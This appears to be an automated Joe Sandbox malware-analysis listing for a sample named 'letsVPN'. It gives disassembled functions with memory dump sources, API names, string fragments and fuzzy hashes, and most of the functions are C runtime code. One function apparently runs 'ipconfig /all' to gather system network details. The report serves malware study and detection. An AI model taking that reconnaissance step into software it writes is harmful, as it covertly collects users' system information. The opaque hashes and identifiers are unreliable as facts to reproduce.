                                                                                                                                                                                                    Function 0000000180002A5C Relevance: 10.5, APIs: 7, Instructions: 38COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_errnosetlocalestd::_
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1855319098-0
                                                                                                                                                                                                    • Opcode ID: 3fc12b65c93056fb327cb2e9bed3c9868cb1a42e88eb998ba55260f1ddffa39a
                                                                                                                                                                                                    • Instruction ID: 77f0e84e2c0fddebd83e6d166913a46376ceeea5f20c07d06525607cc615e4e6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fc12b65c93056fb327cb2e9bed3c9868cb1a42e88eb998ba55260f1ddffa39a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9511ED72B0298849FFEFDEA280A53FC2351DF5DF88F188115E90609186CE65CACCD391
                                                                                                                                                                                                    Function 00000001800140E0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 22COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                    • API String ID: 3186804695-2671469338
                                                                                                                                                                                                    • Opcode ID: a5c0f66d2e7d186b889667cfdb443e7186d6aa942a0e8dfcef2529b2febc3be5
                                                                                                                                                                                                    • Instruction ID: 3db9a0fe6634f3d3d23e1512d5a19f59bf1e8e73e648120e41056d0fc3e5ac56
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a5c0f66d2e7d186b889667cfdb443e7186d6aa942a0e8dfcef2529b2febc3be5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9F03037A0490CD5E7A76F6480063EC35A0E7ACB89F99C561B2004B392CFBD47C88B12
                                                                                                                                                                                                    Function 000000018001C414 Relevance: 9.2, APIs: 6, Instructions: 168COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                    • Opcode ID: e7968ec26cbcd9171451e4b14a09e52ad3a64d5c50effb9d52f7b38fbe92b25e
                                                                                                                                                                                                    • Instruction ID: ae10803b799a65974c3657ee31f7494a09801b087079cfbaffe163c152ee371c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7968ec26cbcd9171451e4b14a09e52ad3a64d5c50effb9d52f7b38fbe92b25e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D761C032300F4893EB96DB16E94179A33A1F78CBD8F448129AE5D07B51DF78C6A98744
                                                                                                                                                                                                    Function 000000018001C9A7 Relevance: 9.1, APIs: 6, Instructions: 101COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$StringType__crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3694965756-0
                                                                                                                                                                                                    • Opcode ID: 6160b9118bac4664cca1a2b30361e3e73a9a23b4989b95d1f03a7ad33b2cdca4
                                                                                                                                                                                                    • Instruction ID: 0015738cc1d336f68e0dd6607cf263a8890d2d7f9e42c5be51a897ba0436e770
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6160b9118bac4664cca1a2b30361e3e73a9a23b4989b95d1f03a7ad33b2cdca4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F441CEB2211BC89ADB9ACF25D584BDD33A5F74C788F418126EA4A83B90DF34C669C704
                                                                                                                                                                                                    Function 0000000180003995 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: rand
                                                                                                                                                                                                    • String ID: VUUU$gfff
                                                                                                                                                                                                    • API String ID: 415692148-2662692612
                                                                                                                                                                                                    • Opcode ID: aed1710db1e936c5847142b025d1a392848f4d806a2ba50e9dea0159a85771d3
                                                                                                                                                                                                    • Instruction ID: f4854c72ffc7a175e6ff49575b655bf0dbf9db01d82d8384a320940945799e3f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: aed1710db1e936c5847142b025d1a392848f4d806a2ba50e9dea0159a85771d3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83313D3232499885F79FCA2F94077DC6655938EBC0F48D029A6468B7C6DF7587858342
                                                                                                                                                                                                    Function 000000018001FB38 Relevance: 9.1, APIs: 6, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale$UpdateUpdate::__errno_getptd_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1281092736-0
                                                                                                                                                                                                    • Opcode ID: ff445e7ee76754bc769ad26fae53bc8746bb45603988ba5daee99b6cacf2494f
                                                                                                                                                                                                    • Instruction ID: 4f06c6f3f5a15a002521f997a85629dd4504b6509dbf14092c61ae02f8fed3b5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff445e7ee76754bc769ad26fae53bc8746bb45603988ba5daee99b6cacf2494f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E317C72604B8886E7A29B11D5847ADB6A5F74CBE0F148121FE5807B95CF34CA8AD740
                                                                                                                                                                                                    Function 000000018000EB24 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Exception$EncodeFileHeaderPointerRaiseThrow_callnewh_calloc_crt
                                                                                                                                                                                                    • String ID: bad allocation
                                                                                                                                                                                                    • API String ID: 2702659324-2104205924
                                                                                                                                                                                                    • Opcode ID: 5bae105f3c952d40fb91f665a23065520cc5472c36bec98307b8226bbcaa616f
                                                                                                                                                                                                    • Instruction ID: dc9fa018054779c8fcebb0e85de3db94547e0c3b80cccd7f8437f53606e47c3f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bae105f3c952d40fb91f665a23065520cc5472c36bec98307b8226bbcaa616f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C011AC71601B4D81EFABDB60A8513E973A4E75D3C0F448124AA4A0A7A5EF38C39DC740
                                                                                                                                                                                                    Function 0000000180009520 Relevance: 7.7, APIs: 5, Instructions: 153COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: fgetc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2807381905-0
                                                                                                                                                                                                    • Opcode ID: 66ab226773c4ed29c2b3b73b3ffce2dcde4310284dfe12c51d04ebbb69d2a6f4
                                                                                                                                                                                                    • Instruction ID: 78140f8f51e7571bcd2013dda56526475d110ba6fe59e891c556e2589ded328f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66ab226773c4ed29c2b3b73b3ffce2dcde4310284dfe12c51d04ebbb69d2a6f4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8711537216A84D9EBA2CF75C4903DC33A5F748B98F548622EA5D87B99DF35C658C300
                                                                                                                                                                                                    Function 0000000180024C4C Relevance: 7.6, APIs: 5, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1573762532-0
                                                                                                                                                                                                    • Opcode ID: 914c7e8c9e0c7ea7e7598fbd7753b30a9f1dd545e222c54bf50bce79fb68c9f0
                                                                                                                                                                                                    • Instruction ID: 512f3f5380ac9d776c87858e981df87ea363a793a3dc2e47b707a79be0fa403e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 914c7e8c9e0c7ea7e7598fbd7753b30a9f1dd545e222c54bf50bce79fb68c9f0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C41F273A0169982EBF7AB25E1403F973A0E748BD5F94C126FA950B6C5DF28CB59C700
                                                                                                                                                                                                    Function 000000018001E5F0 Relevance: 7.6, APIs: 5, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 781512312-0
                                                                                                                                                                                                    • Opcode ID: fef4be43230211745b757583544e173985db2e9b550421944e270028302490ac
                                                                                                                                                                                                    • Instruction ID: 590762b1f0db7b029fd590709c2b03e69e4f35f6dcab51a84d546098a8333d68
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fef4be43230211745b757583544e173985db2e9b550421944e270028302490ac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15410672A04AE982EBE65B1194503FD33A0E769BE0FD4C126F6D5076C4DE28CB598700
                                                                                                                                                                                                    Function 000000018001EF00 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2998201375-0
                                                                                                                                                                                                    • Opcode ID: 9e4fadaa998d07455157caef082a8ac16103ede1be2d2d3d04bf9a7975dcdca8
                                                                                                                                                                                                    • Instruction ID: 6da1e2860e90ad5ce6891b8704c71763f15746ac8b0e06677ba9dfa64d3fdf9b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e4fadaa998d07455157caef082a8ac16103ede1be2d2d3d04bf9a7975dcdca8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7441A432214BC486E7A28F15D1807AD7BA5FB49BC4F18812AFF8957B95CF38C646C700
                                                                                                                                                                                                    Function 000000018000E174 Relevance: 7.5, APIs: 5, Instructions: 32COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __pctype_func_getptd$___lc_codepage_func___lc_locale_name_func_calloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3272742379-0
                                                                                                                                                                                                    • Opcode ID: 84c5df84ef0c5cdd2e916334a6bf5530221d79a09e6cc33207ddf97f696cff82
                                                                                                                                                                                                    • Instruction ID: 041c17907dc4557987ee74c4032ed46d644b029682cb8f8ccb5bb24993d1226d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84c5df84ef0c5cdd2e916334a6bf5530221d79a09e6cc33207ddf97f696cff82
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70F0FF72601B4985FB96EFA1D0553DD7290EB4EF88F18C424BA480F3DADF78C6988391
                                                                                                                                                                                                    Function 0000000180011E28 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3669027769-0
                                                                                                                                                                                                    • Opcode ID: e0e06d72c905a5df2db11f44fd49f3875c1da61348c6b35bcc64d3be87afdf69
                                                                                                                                                                                                    • Instruction ID: 8eacf6c3a0e0d25c8626d20b650a7e713e01794de6f99655e7c2036657d12a82
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0e06d72c905a5df2db11f44fd49f3875c1da61348c6b35bcc64d3be87afdf69
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CF01C32605D8884FFE76BD5E1423FC62E1A75CBC8F0CC521FA540728BDE24CA988755
                                                                                                                                                                                                    Function 0000000180007B30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 152COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0000000180007878: std::exception::exception.LIBCMT ref: 000000018000791C
                                                                                                                                                                                                      • Part of subcall function 0000000180007878: _CxxThrowException.LIBCMT ref: 0000000180007939
                                                                                                                                                                                                      • Part of subcall function 0000000180007878: fgets.LIBCMT ref: 000000018000794C
                                                                                                                                                                                                      • Part of subcall function 0000000180007878: _pclose.LIBCMT ref: 0000000180007980
                                                                                                                                                                                                      • Part of subcall function 0000000180001C6C: std::ios_base::getloc.LIBCPMT ref: 0000000180001C98
                                                                                                                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0000000180007DB0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionIos_base_dtorThrow_pclosefgetsstd::exception::exceptionstd::ios_base::_std::ios_base::getloc
                                                                                                                                                                                                    • String ID: /al$ipco$nfig
                                                                                                                                                                                                    • API String ID: 3465259001-4231646982
                                                                                                                                                                                                    • Opcode ID: 6a92920c7bc4735bc74e8adb372b0bc37048f94f376ff593bf359793745f81a4
                                                                                                                                                                                                    • Instruction ID: 9c91fa3ca3c0817a55952564f80012bba0731b32b0c8655ea8f0e7c389f5f77d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a92920c7bc4735bc74e8adb372b0bc37048f94f376ff593bf359793745f81a4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7715E32610AC89AEBA1DF34D8407D93761FB597A8F508215FA6D1BAEADF34C349C341
                                                                                                                                                                                                    Function 00000001800169AC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentImageNonwritableUnwind
                                                                                                                                                                                                    • String ID: $csm
                                                                                                                                                                                                    • API String ID: 451473138-717980254
                                                                                                                                                                                                    • Opcode ID: 7a01ea639593dd387646a3f7e4420759ba4e612b485dd865fb1099628eb4b212
                                                                                                                                                                                                    • Instruction ID: 3be022b5461d152aabb891bdf172afd75cde4f8b08656ce6a24ee9f740c0854a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a01ea639593dd387646a3f7e4420759ba4e612b485dd865fb1099628eb4b212
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C751F332B02A488BEB97DF15E844B9837A1F748BC8F54C120EE0693798DF70DA89C700
                                                                                                                                                                                                    Function 000000018000EC57 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                    • API String ID: 2118026453-820377970
                                                                                                                                                                                                    • Opcode ID: 3e4e0e1684a06939669e23bbbe86343f175827bd11629dab7abfc3f54090efdb
                                                                                                                                                                                                    • Instruction ID: f37ca4257af8c23d23d2bb1b397a0576a2bc145b126aa7e1e25d2f85e5fdda94
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e4e0e1684a06939669e23bbbe86343f175827bd11629dab7abfc3f54090efdb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7012831205A48C2FA93DB51E4457D8B3A1B74EBD0F448525EA4E16395EF39C68D8300
                                                                                                                                                                                                    Function 0000000180028C94 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2244287686.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244269629.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2244287686.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$DestructExceptionObject
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 2821275340-1018135373
                                                                                                                                                                                                    • Opcode ID: a9840fc552d5e32cb518b91f9157295173cd6d80fbcfbbbd7aaf308e4ccaaf6a
                                                                                                                                                                                                    • Instruction ID: c175b3ae7acb65c193fc889e73e4d0c379e904474d6a669c45e4c9de5337dc13
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9840fc552d5e32cb518b91f9157295173cd6d80fbcfbbbd7aaf308e4ccaaf6a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C301863650268989EBA2AF31C8817EC23A4FB4DBDDF189131FE094A745CF30CA88D340
                                                                                                                                                                                                    Function 00000001800244FF Relevance: 6.1, APIs: 4, Instructions: 120COMMON
